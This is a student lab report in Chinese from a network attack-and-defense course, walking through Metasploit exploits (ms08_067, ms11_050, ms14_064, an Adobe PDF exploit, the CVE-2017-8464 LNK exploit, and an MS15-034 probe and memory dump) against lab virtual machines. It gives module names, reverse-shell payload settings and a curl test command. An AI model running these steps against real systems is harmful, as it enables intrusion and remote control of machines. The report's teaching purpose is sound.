2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用
一、 实践内容(3.5分)
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,如ms08_067; (1分)
1.2 一个针对浏览器的攻击,如ms11_050;(1分)
1.3 一个针对客户端的攻击,如Adobe;(1分)
1.4 成功应用任何一个辅助模块。(0.5分)
任务一 主动攻击实践,ms08_067
靶机:Windows XP
主机: Kali
1、输入msfconsole指令,进入控制台,却遇到以下问题,原因是没有连接数据库:
2、输入service postgresql start启动数据库,再次进入控制台,输入search ms08-067查看ms08_067这个漏洞在哪里:
3、选择漏洞use exploit/windows/smb/ms08_067_netapi;
输入show payloads,查看可以供我们使用的payload:
4、选择通过反向连接来获取shell的generic/shell_reverse_tcp当payload,输入指令set payload generic/shell_reverse_tcp
对payload进行设置;
5、输入show options查看我们需要设置的参数,发现需要设置一个RHOST和一个LHOST:
6、修改target的值为0,选择我们想要攻击的计算机系统:
7、输入exploit进行攻击,攻击成功:
任务二:一个针对浏览器的攻击
1、实现ms11_050的攻击
靶机:Windows XP SP3
主机: Kali
实验步骤:
搜索漏洞search ms11_050;
使用漏洞use exploit/windows/browser/ms11_050_mshtml_cobjectelement;
设置靶机类型set target 3;
选择攻击载荷set payload generic/shell_reverse_tcp;
使用命令set SRVHOST 192.168.1.238设置地址;
配置好地址后显示配置信息show options;
结果攻击成功:
2、实现ms14_064的攻击
靶机:Windows XP SP3 English IE8
主机:Kali
实验步骤:
搜索漏洞,然后使用漏洞,使用show payloads查看适用攻击载荷;
选择攻击载荷set payload generic/shell_reverse_tcp;
查看配置信息show options;
而后通过查看配置信息添加所需选项;
设置监听地址、监听端口和url域名;
输入exploit 开始攻击,并在靶机打开IE浏览器输入生成的网址,kali的8080端口监听获得连接,建立会话;
查看开启的会话;
攻击成功截图:
任务三:一个针对客户端的攻击
一、实现对Adobe的攻击
靶机:Windows XP sp3(English)
1、选择攻击模块,将其载入,选用exploit/windows/fileformat/adobe_toolbutton,如图:
2、输入命令show payloads选择要使用的payload;
3、输入命令show options查看相关参数设置要求:
4、开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个20165236.pdf文件,将该文件传送到靶机上并且在攻击机上打开监听
5、将靶机中的pdf文件打开,攻击机成功获取到靶机shell:
二、实现对CVE-2017-8464的攻击
靶机是Win7
实验步骤:
1、使用命令:search CVE:2018 type:exploit查看CVE-2017和2018漏洞有哪些:
2、使用指令:
msfconsole
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.19.129
exploit
3、将生成的.lnk文件复制到U盘里面,然后在msf中开始监听;
4、将U盘插入靶机中,如图,攻击成功:
任务四:实现对应用辅助模块的攻击
靶机:windows server 2012 R2
IP:192.168.19.148
实验步骤:
1、使用search use auxiliary/server扫描靶机开发端口:
2、win2012安装iis服务后访问80端口,检测是否存在漏洞:使用curl发送以下数据:
curl http://192.168.19.148 -H "Host: 192.168.19.148" -H "Range: bytes=0-18446744073709551615",
当出现Requested Range Not Satisfiable时说明存在漏洞;
3、依次输入以下指令进行攻击:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
show options
set rhosts 192.168.19.148
set threads 10
exploit
4、如图所示,对靶机windows server 2012攻击成功:
二、实验过程遇到的问题
1、在一个主动攻击实践实验过程中,进入控制台时,遇到如下问题:
原因是没有连接到数据库;
解决方法:使用命令service postgresql start启动数据库,即可进入控制台:
三、基础问题回答
1、用自己的话解释什么是exploit,payload,encode?
答:exploit:英文翻译为利用,黑客就是利用漏洞对电脑进行攻击,有漏洞不一定可以利用,但可以利用的一定有漏洞;
payload:有效载荷。在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,并且在每一批数据的头和尾都加上一定的辅助信息,而其中的原始数据就是payload;
encode:编码器,用来给payload进行编码,保护payload不被发现。
四、实验体会
本次实验目的是掌握metasploit的基本应用方式,重点常用的三种攻击方式。可以说是对之前所学知识的总结,我最大的感悟就是
虽然其中每次攻击不一定都能成功,但msf确实非常的强大,为此一定要及时更新系统,填补漏洞以防被攻击。实验过程中我也遇到了许多问题,
在查阅资料以及老师同学的帮助下一个个解决了,并顺利完成了实验。
最新文章
- HDU4411 最小费用流
- Asp.Net WebApi开发注意
- 在线程池使用Callable和Runnable的区别以及如何关闭线程
- php preg_match_all 和 str_replace 替换图片链接
- SQL Server数据库(SQL Sever语言 存储过程及触发器)
- ActiveMQ中Session设置的相关理解
- tlplayer 所有平台版本支持水印叠加
- Google实习面试归来
- winform中如何在TextBox中只能输入数字(可以带小数点)
- hdu1690 Bus System (dijkstra)
- Win95+IE3 – Win10+IE11全版本执行漏洞(含POC)
- Cassandra HBase和MongoDb性能比较
- lucene复合条件查询案例——查询name域 或 description域 包含lucene关键字的两种方式
- Watto and Mechanism CodeForces - 514C (字典树,哈希)
- 007 @CookieValue绑定请求中的cookie
- [py]python中的特殊类class type和类的两面性图解
- C#实现不安装Oracle客户端访问远程服务器数据
- 20145313Java第五次实验
- [Linux]Ubuntu中的System Setting
- mac下面安装多个JDK